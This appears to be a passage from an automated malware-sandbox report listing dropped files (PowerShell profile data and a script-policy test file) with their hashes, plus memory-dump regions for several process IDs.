SHA1
074dbaa9de6c6894464c336506e79e1b942774c3

SHA256
fe762147b6a85172ea43e33504f8b8faa0e5e3e1389bcc72893604fd87dbe9ab

SHA512
f4a107ea936e1d8c9953c9dc1857cab08c3fa2006f3f821e3f902466ded54f7f3fc89721829aa0bd0b2cec0d6f46631bee8cc496f505d09f994574fc23ddb70a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7160acb949a9bd2445fc778b248be9f0

SHA1
093ebdc410c05b2e723f742fc70f21380fa52566

SHA256
c0999b067446bc532bfdd5ceb5754fa1539dba3ac1eab33b4c6562635c5901f7

SHA512
37ce82848df6bf3b862af11ad05a13161b6172a4464f20caa7a81de395c376c38096c2c9d653a3f18dfd63e4abc13c96d60963ba98527a10e127306019b64636

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltusjkqd.t45.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1452-44-0x0000000000D20000-0x0000000000DEE000-memory.dmp

Filesize
824KB

Download
memory/2716-50-0x0000024C492E0000-0x0000024C49302000-memory.dmp

Filesize
136KB

Download
memory/2912-71-0x000002D42DFC0000-0x000002D42E036000-memory.dmp

Filesize
472KB

Download
memory/2912-73-0x000002D413CD0000-0x000002D413CEE000-memory.dmp

Filesize
120KB

Download
memory/2912-109-0x000002D415510000-0x000002D41551A000-memory.dmp

Filesize
40KB

Download
memory/2912-110-0x000002D415540000-0x000002D415552000-memory.dmp

Filesize
72KB

Download
memory/2912-72-0x000002D4154C0000-0x000002D415510000-memory.dmp

Filesize
320KB

Download
memory/2912-39-0x000002D413810000-0x000002D413850000-memory.dmp

Filesize
256KB

Download
memory/3632-38-0x0000000000CA0000-0x0000000000CB8000-memory.dmp

Filesize
96KB

Download
memory/3632-28-0x00007FF9FE873000-0x00007FF9FE875000-memory.dmp

Filesize
8KB

Download
memory/3632-176-0x000000001DA00000-0x000000001DA0C000-memory.dmp

Filesize
48KB

Download
memory/3632-177-0x00007FF9FE873000-0x00007FF9FE875000-memory.dmp

Filesize
8KB

Download
memory/3632-178-0x000000001DA90000-0x000000001DA9E000-memory.dmp

Filesize
56KB

Download
memory/3632-180-0x00000000013E0000-0x00000000013E8000-memory.dmp

Filesize
32KB

Download